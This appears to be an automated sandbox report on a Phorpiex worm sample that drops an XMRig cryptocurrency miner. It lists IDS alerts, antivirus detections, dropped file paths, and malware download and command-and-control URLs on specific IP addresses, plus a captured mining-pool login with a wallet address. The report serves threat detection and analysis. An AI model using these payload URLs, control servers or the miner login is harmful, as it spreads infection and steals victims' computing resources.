                  2024-11-30T01:55:12.157808+010028032742Potentially Bad Traffic192.168.2.449732185.215.113.6680TCP
                  2024-11-30T01:55:14.681534+010028032742Potentially Bad Traffic192.168.2.449735185.215.113.6680TCP
                  2024-11-30T01:55:20.218277+010028032742Potentially Bad Traffic192.168.2.449735185.215.113.6680TCP
                  2024-11-30T01:55:20.327433+010028032742Potentially Bad Traffic192.168.2.449740185.215.113.8480TCP
                  2024-11-30T01:55:22.714304+010028032742Potentially Bad Traffic192.168.2.449743185.215.113.6680TCP
                  2024-11-30T01:55:28.694438+010028032742Potentially Bad Traffic192.168.2.449743185.215.113.6680TCP
                  2024-11-30T01:55:28.767054+010028032742Potentially Bad Traffic192.168.2.44974491.202.233.14180TCP
                  2024-11-30T01:55:31.296399+010028032742Potentially Bad Traffic192.168.2.449745185.215.113.6680TCP
                  2024-11-30T01:55:37.316536+010028032742Potentially Bad Traffic192.168.2.449745185.215.113.6680TCP
                  2024-11-30T01:55:42.142585+010028032742Potentially Bad Traffic192.168.2.44974791.202.233.14180TCP
                  2024-11-30T01:55:45.697822+010028032742Potentially Bad Traffic192.168.2.44974891.202.233.14180TCP
                  2024-11-30T01:55:49.224521+010028032742Potentially Bad Traffic192.168.2.44974991.202.233.14180TCP
                  2024-11-30T01:55:52.766364+010028032742Potentially Bad Traffic192.168.2.44975191.202.233.14180TCP
                  2024-11-30T01:55:55.425836+010028032742Potentially Bad Traffic192.168.2.44975191.202.233.14180TCP
                  2024-11-30T01:56:00.283579+010028032742Potentially Bad Traffic192.168.2.449759185.215.113.6680TCP
                  2024-11-30T01:56:03.800114+010028032742Potentially Bad Traffic192.168.2.449771185.215.113.6680TCP
                  2024-11-30T01:56:07.426273+010028032742Potentially Bad Traffic192.168.2.449777185.215.113.6680TCP
                  2024-11-30T01:56:11.086687+010028032742Potentially Bad Traffic192.168.2.449789185.215.113.6680TCP
                  2024-11-30T01:56:14.741051+010028032742Potentially Bad Traffic192.168.2.449796185.215.113.6680TCP
                  2024-11-30T01:56:19.363629+010028032742Potentially Bad Traffic192.168.2.44980791.202.233.14180TCP
                  2024-11-30T01:56:23.171699+010028032742Potentially Bad Traffic192.168.2.44981991.202.233.14180TCP
                  2024-11-30T01:56:26.963611+010028032742Potentially Bad Traffic192.168.2.44982791.202.233.14180TCP
                  2024-11-30T01:56:30.538736+010028032742Potentially Bad Traffic192.168.2.44983991.202.233.14180TCP
                  2024-11-30T01:56:34.305094+010028032742Potentially Bad Traffic192.168.2.44984791.202.233.14180TCP
                  2024-11-30T01:56:39.313398+010028032742Potentially Bad Traffic192.168.2.449860185.215.113.6680TCP
                  2024-11-30T01:56:43.014699+010028032742Potentially Bad Traffic192.168.2.449869185.215.113.6680TCP
                  2024-11-30T01:56:46.805249+010028032742Potentially Bad Traffic192.168.2.449881185.215.113.6680TCP
                  2024-11-30T01:56:50.427549+010028032742Potentially Bad Traffic192.168.2.449887185.215.113.6680TCP
                  2024-11-30T01:56:54.300804+010028032742Potentially Bad Traffic192.168.2.449899185.215.113.6680TCP
                  2024-11-30T01:56:59.115895+010028032742Potentially Bad Traffic192.168.2.44991191.202.233.14180TCP
                  2024-11-30T01:57:02.821150+010028032742Potentially Bad Traffic192.168.2.44991891.202.233.14180TCP
                  2024-11-30T01:57:08.358969+010028032742Potentially Bad Traffic192.168.2.44993091.202.233.14180TCP
                  2024-11-30T01:57:11.852789+010028032742Potentially Bad Traffic192.168.2.44994291.202.233.14180TCP
                  2024-11-30T01:57:15.530794+010028032742Potentially Bad Traffic192.168.2.44994991.202.233.14180TCP
                  2024-11-30T01:57:20.251660+010028032742Potentially Bad Traffic192.168.2.449961185.215.113.6680TCP
                  2024-11-30T01:57:24.080280+010028032742Potentially Bad Traffic192.168.2.449970185.215.113.6680TCP
                  2024-11-30T01:57:27.874104+010028032742Potentially Bad Traffic192.168.2.449982185.215.113.6680TCP
                  2024-11-30T01:57:31.929120+010028032742Potentially Bad Traffic192.168.2.449988185.215.113.6680TCP
                  2024-11-30T01:57:35.524932+010028032742Potentially Bad Traffic192.168.2.450000185.215.113.6680TCP
                  2024-11-30T01:57:40.230682+010028032742Potentially Bad Traffic192.168.2.45001191.202.233.14180TCP
                  2024-11-30T01:57:43.928289+010028032742Potentially Bad Traffic192.168.2.45001791.202.233.14180TCP
                  2024-11-30T01:57:47.642419+010028032742Potentially Bad Traffic192.168.2.45002491.202.233.14180TCP
                  2024-11-30T01:57:51.153754+010028032742Potentially Bad Traffic192.168.2.45003691.202.233.14180TCP
                  2024-11-30T01:57:54.672944+010028032742Potentially Bad Traffic192.168.2.45004791.202.233.14180TCP
                  2024-11-30T01:57:59.556433+010028032742Potentially Bad Traffic192.168.2.450055185.215.113.6680TCP
                  2024-11-30T01:58:03.392591+010028032742Potentially Bad Traffic192.168.2.450066185.215.113.6680TCP
                  2024-11-30T01:58:06.983843+010028032742Potentially Bad Traffic192.168.2.450075185.215.113.6680TCP
                  2024-11-30T01:58:10.587648+010028032742Potentially Bad Traffic192.168.2.450077185.215.113.6680TCP
                  2024-11-30T01:58:14.120601+010028032742Potentially Bad Traffic192.168.2.450078185.215.113.6680TCP
                  2024-11-30T01:58:18.867325+010028032742Potentially Bad Traffic192.168.2.45008091.202.233.14180TCP
                  2024-11-30T01:58:22.945317+010028032742Potentially Bad Traffic192.168.2.45008291.202.233.14180TCP
                  2024-11-30T01:58:26.530530+010028032742Potentially Bad Traffic192.168.2.45008491.202.233.14180TCP
                  2024-11-30T01:58:30.003040+010028032742Potentially Bad Traffic192.168.2.45008691.202.233.14180TCP
                  2024-11-30T01:58:33.584224+010028032742Potentially Bad Traffic192.168.2.45008791.202.233.14180TCP
                  2024-11-30T01:58:38.346062+010028032742Potentially Bad Traffic192.168.2.450089185.215.113.6680TCP
                  2024-11-30T01:58:42.080355+010028032742Potentially Bad Traffic192.168.2.450091185.215.113.6680TCP
                  2024-11-30T01:58:45.636005+010028032742Potentially Bad Traffic192.168.2.450093185.215.113.6680TCP
                  2024-11-30T01:58:49.207695+010028032742Potentially Bad Traffic192.168.2.450094185.215.113.6680TCP
                  2024-11-30T01:58:52.843123+010028032742Potentially Bad Traffic192.168.2.450096185.215.113.6680TCP
                  2024-11-30T01:58:57.381150+010028032742Potentially Bad Traffic192.168.2.45009891.202.233.14180TCP
                  2024-11-30T01:59:00.988438+010028032742Potentially Bad Traffic192.168.2.45010091.202.233.14180TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-30T01:55:03.970185+010028482951A Network Trojan was detected192.168.2.449730185.215.113.6680TCP
                  2024-11-30T01:55:06.450023+010028482951A Network Trojan was detected192.168.2.449732185.215.113.6680TCP
                  2024-11-30T01:55:12.157808+010028482951A Network Trojan was detected192.168.2.449732185.215.113.6680TCP
                  2024-11-30T01:55:14.681534+010028482951A Network Trojan was detected192.168.2.449735185.215.113.6680TCP
                  2024-11-30T01:55:20.218277+010028482951A Network Trojan was detected192.168.2.449735185.215.113.6680TCP
                  2024-11-30T01:55:22.714304+010028482951A Network Trojan was detected192.168.2.449743185.215.113.6680TCP
                  2024-11-30T01:55:28.694438+010028482951A Network Trojan was detected192.168.2.449743185.215.113.6680TCP
                  2024-11-30T01:55:31.296399+010028482951A Network Trojan was detected192.168.2.449745185.215.113.6680TCP
                  2024-11-30T01:55:37.316536+010028482951A Network Trojan was detected192.168.2.449745185.215.113.6680TCP
                  2024-11-30T01:55:42.142585+010028482951A Network Trojan was detected192.168.2.44974791.202.233.14180TCP
                  2024-11-30T01:55:45.697822+010028482951A Network Trojan was detected192.168.2.44974891.202.233.14180TCP
                  2024-11-30T01:55:49.224521+010028482951A Network Trojan was detected192.168.2.44974991.202.233.14180TCP
                  2024-11-30T01:55:52.766364+010028482951A Network Trojan was detected192.168.2.44975191.202.233.14180TCP
                  2024-11-30T01:55:55.425836+010028482951A Network Trojan was detected192.168.2.44975191.202.233.14180TCP
                  2024-11-30T01:56:00.283579+010028482951A Network Trojan was detected192.168.2.449759185.215.113.6680TCP
                  2024-11-30T01:56:03.800114+010028482951A Network Trojan was detected192.168.2.449771185.215.113.6680TCP
                  2024-11-30T01:56:07.426273+010028482951A Network Trojan was detected192.168.2.449777185.215.113.6680TCP
                  2024-11-30T01:56:11.086687+010028482951A Network Trojan was detected192.168.2.449789185.215.113.6680TCP
                  2024-11-30T01:56:14.741051+010028482951A Network Trojan was detected192.168.2.449796185.215.113.6680TCP
                  2024-11-30T01:56:19.363629+010028482951A Network Trojan was detected192.168.2.44980791.202.233.14180TCP
                  2024-11-30T01:56:23.171699+010028482951A Network Trojan was detected192.168.2.44981991.202.233.14180TCP
                  2024-11-30T01:56:26.963611+010028482951A Network Trojan was detected192.168.2.44982791.202.233.14180TCP
                  2024-11-30T01:56:30.538736+010028482951A Network Trojan was detected192.168.2.44983991.202.233.14180TCP
                  2024-11-30T01:56:34.305094+010028482951A Network Trojan was detected192.168.2.44984791.202.233.14180TCP
                  2024-11-30T01:56:39.313398+010028482951A Network Trojan was detected192.168.2.449860185.215.113.6680TCP
                  2024-11-30T01:56:43.014699+010028482951A Network Trojan was detected192.168.2.449869185.215.113.6680TCP
                  2024-11-30T01:56:46.805249+010028482951A Network Trojan was detected192.168.2.449881185.215.113.6680TCP
                  2024-11-30T01:56:50.427549+010028482951A Network Trojan was detected192.168.2.449887185.215.113.6680TCP
                  2024-11-30T01:56:54.300804+010028482951A Network Trojan was detected192.168.2.449899185.215.113.6680TCP
                  2024-11-30T01:56:59.115895+010028482951A Network Trojan was detected192.168.2.44991191.202.233.14180TCP
                  2024-11-30T01:57:02.821150+010028482951A Network Trojan was detected192.168.2.44991891.202.233.14180TCP
                  2024-11-30T01:57:08.358969+010028482951A Network Trojan was detected192.168.2.44993091.202.233.14180TCP
                  2024-11-30T01:57:11.852789+010028482951A Network Trojan was detected192.168.2.44994291.202.233.14180TCP
                  2024-11-30T01:57:15.530794+010028482951A Network Trojan was detected192.168.2.44994991.202.233.14180TCP
                  2024-11-30T01:57:20.251660+010028482951A Network Trojan was detected192.168.2.449961185.215.113.6680TCP
                  2024-11-30T01:57:24.080280+010028482951A Network Trojan was detected192.168.2.449970185.215.113.6680TCP
                  2024-11-30T01:57:27.874104+010028482951A Network Trojan was detected192.168.2.449982185.215.113.6680TCP
                  2024-11-30T01:57:31.929120+010028482951A Network Trojan was detected192.168.2.449988185.215.113.6680TCP
                  2024-11-30T01:57:35.524932+010028482951A Network Trojan was detected192.168.2.450000185.215.113.6680TCP
                  2024-11-30T01:57:40.230682+010028482951A Network Trojan was detected192.168.2.45001191.202.233.14180TCP
                  2024-11-30T01:57:43.928289+010028482951A Network Trojan was detected192.168.2.45001791.202.233.14180TCP
                  2024-11-30T01:57:47.642419+010028482951A Network Trojan was detected192.168.2.45002491.202.233.14180TCP
                  2024-11-30T01:57:51.153754+010028482951A Network Trojan was detected192.168.2.45003691.202.233.14180TCP
                  2024-11-30T01:57:54.672944+010028482951A Network Trojan was detected192.168.2.45004791.202.233.14180TCP
                  2024-11-30T01:57:59.556433+010028482951A Network Trojan was detected192.168.2.450055185.215.113.6680TCP
                  2024-11-30T01:58:03.392591+010028482951A Network Trojan was detected192.168.2.450066185.215.113.6680TCP
                  2024-11-30T01:58:06.983843+010028482951A Network Trojan was detected192.168.2.450075185.215.113.6680TCP
                  2024-11-30T01:58:10.587648+010028482951A Network Trojan was detected192.168.2.450077185.215.113.6680TCP
                  2024-11-30T01:58:14.120601+010028482951A Network Trojan was detected192.168.2.450078185.215.113.6680TCP
                  2024-11-30T01:58:18.867325+010028482951A Network Trojan was detected192.168.2.45008091.202.233.14180TCP
                  2024-11-30T01:58:22.945317+010028482951A Network Trojan was detected192.168.2.45008291.202.233.14180TCP
                  2024-11-30T01:58:26.530530+010028482951A Network Trojan was detected192.168.2.45008491.202.233.14180TCP
                  2024-11-30T01:58:30.003040+010028482951A Network Trojan was detected192.168.2.45008691.202.233.14180TCP
                  2024-11-30T01:58:33.584224+010028482951A Network Trojan was detected192.168.2.45008791.202.233.14180TCP
                  2024-11-30T01:58:38.346062+010028482951A Network Trojan was detected192.168.2.450089185.215.113.6680TCP
                  2024-11-30T01:58:42.080355+010028482951A Network Trojan was detected192.168.2.450091185.215.113.6680TCP
                  2024-11-30T01:58:45.636005+010028482951A Network Trojan was detected192.168.2.450093185.215.113.6680TCP
                  2024-11-30T01:58:49.207695+010028482951A Network Trojan was detected192.168.2.450094185.215.113.6680TCP
                  2024-11-30T01:58:52.843123+010028482951A Network Trojan was detected192.168.2.450096185.215.113.6680TCP
                  2024-11-30T01:58:57.381150+010028482951A Network Trojan was detected192.168.2.45009891.202.233.14180TCP
                  2024-11-30T01:59:00.988438+010028482951A Network Trojan was detected192.168.2.45010091.202.233.14180TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: newtpp.exeAvira: detected
                  Antivirus detection for URL or domain
                  Source: http://185.215.113.84/nxmr.exeP0Avira URL Cloud: Label: malware
                  Source: http://91.202.233.141/$Avira URL Cloud: Label: malware
                  Source: http://185.215.113.84/nxmr.exeAvira URL Cloud: Label: malware
                  Source: http://91.202.233.141/IBSTSWSONLeAvira URL Cloud: Label: malware
                  Source: http://185.215.113.84/BAvira URL Cloud: Label: malware
                  Source: http://91.202.233.141/2Avira URL Cloud: Label: malware
                  Source: http://91.202.233.141/1Avira URL Cloud: Label: malware
                  Source: http://185.215.113.66/5rosoftAvira URL Cloud: Label: malware
                  Source: http://91.202.233.141/5Avira URL Cloud: Label: malware
                  Source: http://91.202.233.141/3Avira URL Cloud: Label: malware
                  Source: http://91.202.233.141/4Avira URL Cloud: Label: malware
                  Source: http://91.202.233.141/IBSTSWSONLMozilla/5.0Avira URL Cloud: Label: malware
                  Source: http://91.202.233.141/2tAvira URL Cloud: Label: malware
                  Source: http://91.202.233.141/2jAvira URL Cloud: Label: malware
                  Source: http://91.202.233.141/IBSTSWSONLMAvira URL Cloud: Label: malware
                  Source: http://185.215.113.66/5jAvira URL Cloud: Label: malware
                  Source: http://185.215.113.66/tcoin.php?s=%sAvira URL Cloud: Label: malware
                  Source: http://185.215.113.66/3:Avira URL Cloud: Label: malware
                  Source: http://185.215.113.66/1~Avira URL Cloud: Label: malware
                  Source: http://185.215.113.66/3=Avira URL Cloud: Label: malware
                  Source: http://91.202.233.141/37Avira URL Cloud: Label: malware
                  Source: http://185.215.113.66/http://91.202.233.141/12345%s%s%s:Zone.Identifier%userprofile%%windir%%sAvira URL Cloud: Label: malware
                  Source: http://185.215.113.66/tcoin.php?s=%sMozilla/5.0Avira URL Cloud: Label: malware
                  Source: http://185.215.113.66/5Avira URL Cloud: Label: malware
                  Source: http://185.215.113.66/4Avira URL Cloud: Label: malware
                  Source: http://185.215.113.84/nxmr.exe?Avira URL Cloud: Label: malware
                  Source: http://91.202.233.141/27Avira URL Cloud: Label: malware
                  Source: http://185.215.113.66/4JJC:Avira URL Cloud: Label: malware
                  Source: http://91.202.233.141/2/Avira URL Cloud: Label: malware
                  Source: http://185.215.113.84/nxmr.exeystem32Avira URL Cloud: Label: malware
                  Source: http://185.215.113.66/16G-Avira URL Cloud: Label: malware
                  Source: http://185.215.113.66/1:G)Avira URL Cloud: Label: malware
                  Source: http://91.202.233.141/IBSTSWSONLAvira URL Cloud: Label: malware
                  Source: http://185.215.113.66/4GAvira URL Cloud: Label: malware
                  Source: http://91.202.233.141/2#Avira URL Cloud: Label: malware
                  Source: http://185.215.113.66/2mAvira URL Cloud: Label: malware
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\2736615137.exeAvira: detection malicious, Label: WORM/Phorpiex.olrti
                  Source: C:\Users\user\AppData\Local\Temp\204078699.exeAvira: detection malicious, Label: TR/Dropper.Gen
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nxmr[1].exeAvira: detection malicious, Label: HEUR/AGEN.1329646
                  Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeAvira: detection malicious, Label: HEUR/AGEN.1329646
                  Source: C:\Users\user\AppData\Local\Temp\1088610392.exeAvira: detection malicious, Label: HEUR/AGEN.1329646
                  Source: C:\Windows\sysnldcvmr.exeAvira: detection malicious, Label: HEUR/AGEN.1315882
                  Multi AV Scanner detection for domain / URL
                  Source: http://91.202.233.141/IBSTSWSONLeVirustotal: Detection: 17%Perma Link
                  Source: http://185.215.113.84/BVirustotal: Detection: 15%Perma Link
                  Source: http://185.215.113.84/nxmr.exeP0Virustotal: Detection: 16%Perma Link
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nxmr[1].exeReversingLabs: Detection: 76%
                  Source: C:\Users\user\AppData\Local\Temp\1088610392.exeReversingLabs: Detection: 76%
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeReversingLabs: Detection: 79%
                  Source: C:\Users\user\AppData\Local\Temp\191563587.exeReversingLabs: Detection: 62%
                  Source: C:\Users\user\AppData\Local\Temp\204078699.exeReversingLabs: Detection: 50%
                  Source: C:\Users\user\AppData\Local\Temp\2736615137.exeReversingLabs: Detection: 91%
                  Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmpReversingLabs: Detection: 70%
                  Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeReversingLabs: Detection: 76%
                  Source: C:\Windows\sysnldcvmr.exeReversingLabs: Detection: 81%
                  Multi AV Scanner detection for submitted file
                  Source: newtpp.exeReversingLabs: Detection: 81%
                  Source: newtpp.exeVirustotal: Detection: 75%Perma Link
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\2736615137.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nxmr[1].exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmpJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\1088610392.exeJoe Sandbox ML: detected
                  Source: C:\Windows\sysnldcvmr.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: newtpp.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\Desktop\newtpp.exeCode function: 0_2_0040BE80 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,0_2_0040BE80
                  Source: C:\Windows\sysnldcvmr.exeCode function: 1_2_0040BE80 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,1_2_0040BE80
                  Source: C:\Windows\sysnldcvmr.exeCode function: 2_2_0040BE80 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,2_2_0040BE80

                  Bitcoin Miner

                  barindex
                  Yara detected Xmrig cryptocurrency miner
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 21.2.winupsecvmgr.exe.7ff7a2e10320.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 31.2.winupsecvmgr.exe.7ff7a2e10320.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 31.2.winupsecvmgr.exe.7ff7a2e10320.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 21.2.winupsecvmgr.exe.7ff7a2e10320.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 21.2.winupsecvmgr.exe.7ff7a2e0ca40.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 31.2.winupsecvmgr.exe.7ff7a2dd0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 21.2.winupsecvmgr.exe.7ff7a2dd0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 31.2.winupsecvmgr.exe.7ff7a2e0ca40.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001C.00000002.4115958696.000002434C9E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000002.4115958696.000002434CA42000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000002.2592219686.00007FF7A2DEB000.00000004.00000001.01000000.0000000F.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001F.00000002.3318375595.00007FF7A2DEB000.00000004.00000001.01000000.0000000F.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: winupsecvmgr.exe PID: 7860, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, type: DROPPED
                  Detected Stratum mining protocol
                  Source: global trafficTCP traffic: 192.168.2.4:49838 -> 185.215.113.66:5152 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"47feq5mtn8mcl91sadm6ooigyfkddgftchftudhdqloyz4kps7jg19n1ua8eswuzometjqqkkkzr6nmcbuwa3htua2dee6e","pass":"x","agent":"xmrig/6.19.0 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/gpu","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.
                  Found strings related to Crypto-Mining
                  Source: winupsecvmgr.exe, 00000015.00000002.2592219686.00007FF7A2DEB000.00000004.00000001.01000000.0000000F.sdmpString found in binary or memory: losestratum+tcp://
                  Source: winupsecvmgr.exe, 00000015.00000002.2592219686.00007FF7A2DEB000.00000004.00000001.01000000.0000000F.sdmpString found in binary or memory: cryptonight/0
                  Source: winupsecvmgr.exe, 00000015.00000002.2592219686.00007FF7A2DEB000.00000004.00000001.01000000.0000000F.sdmpString found in binary or memory: losestratum+tcp://
                  Source: winupsecvmgr.exe, 00000015.00000002.2592219686.00007FF7A2DEB000.00000004.00000001.01000000.0000000F.sdmpString found in binary or memory: -o, --url=URL URL of mining server
                  Source: winupsecvmgr.exe, 00000015.00000002.2592219686.00007FF7A2DEB000.00000004.00000001.01000000.0000000F.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
                  Source: winupsecvmgr.exe, 00000015.00000002.2592219686.00007FF7A2DEB000.00000004.00000001.01000000.0000000F.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
                  Source: newtpp.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Users\user\AppData\Local\Temp\2736615137.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dllJump to behavior
                  Source: Binary string: ntkrnlmp.pdbx, source: 191563587.exe, 00000010.00000002.4518239198.0000000009DBB000.00000004.00000020.00020000.00000000.sdmp, 191563587.exe, 00000010.00000002.4457470873.0000000009026000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: 191563587.exe, 00000010.00000002.4518239198.0000000009DBB000.00000004.00000020.00020000.00000000.sdmp, 191563587.exe, 00000010.00000002.4457470873.0000000009026000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: winupsecvmgr.exe, 00000015.00000002.2592219686.00007FF7A2DEB000.00000004.00000001.01000000.0000000F.sdmp
                  Source: C:\Users\user\Desktop\newtpp.exeCode function: 0_2_004066B0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,0_2_004066B0
                  Source: C:\Users\user\Desktop\newtpp.exeCode function: 0_2_00406570 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406570
                  Source: C:\Windows\sysnldcvmr.exeCode function: 1_2_004066B0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,1_2_004066B0
                  Source: C:\Windows\sysnldcvmr.exeCode function: 1_2_00406570 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00406570
                  Source: C:\Windows\sysnldcvmr.exeCode function: 2_2_004066B0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,2_2_004066B0
                  Source: C:\Windows\sysnldcvmr.exeCode function: 2_2_00406570 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00406570
                  Source: C:\Users\user\AppData\Local\Temp\191563587.exeCode function: 16_2_00AF1A20 memset,memset,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,PathCombineW,CharLowerW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathCombineW,FindNextFileW,CloseHandle,16_2_00AF1A20

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:56186 -> 77.44.192.46:40500
                  Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:56186 -> 182.188.65.58:40500
                  Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:56186 -> 38.224.37.24:40500
                  Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:56186 -> 2.190.67.184:40500
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49735 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49732 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49730 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49743 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:56186 -> 89.218.218.206:40500
                  Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49745 -> 185.215.113.66:80
                  Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:56186 -> 189.150.7.25:40500
                  Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:56186 -> 134.35.126.112:40500
                  Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:56186 -> 2.176.90.19:40500
